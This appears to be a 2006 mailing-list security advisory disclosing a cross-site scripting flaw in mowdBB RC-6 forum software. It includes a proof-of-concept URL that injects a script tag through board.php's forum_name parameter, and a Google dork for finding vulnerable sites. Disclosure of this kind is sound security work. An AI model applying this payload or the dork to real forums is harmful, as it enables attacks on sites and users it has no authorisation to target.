Computer Security

Security Advisory: new xss in modbb forum
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [ISecAuditors Security Advisories] IMAP/SMTP Injection in Hastymail

  XSS in JAB Guest Book

  Multiple bugs in TFT-Gallery

  Vt-Forum Lite System V.1.3   Xss Vuln.

From:h angel <angel_h6_(at)_yahoo.fr>
Date:05.12.2006
Subject:new xss in modbb forum



**************************************************
**************************************************
******

mowdBB forums

**************************************************
**************************************************
******

* mowdBB RC-6 ;

* Class = XSS ;

* Found by = ScReAmDz

* contact me = halim_gh83[at]hotmail[dot]com
---------------------------------------------------------------------------------
----------------------------------

- Exploit:

http://[target]/[path]/board.
php?forum_id=99&forum_name%5B99%5D=><script>alert(1)
;</script>


---------------------------------------------------------------------------------
---------------------------------

google dork : Powered by mowdBB RC-6 © 2002-2005 or
"mowdbb"

---------------------------------------------------------------------------------
---------------------------------

Gr33tz: broken-proxy.sniperfox-dz.blacksol-dz

and all hack15 members

**************************************************
**************************************************
**********



       

       
               
___________________________________________________________________________
Découvrez une nouvelle façon d'obtenir des réponses à toutes vos questions !
Profitez des connaissances, des opinions et des expériences des internautes sur Yahoo!
Questions/Réponses
http://fr.answers.yahoo.com
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server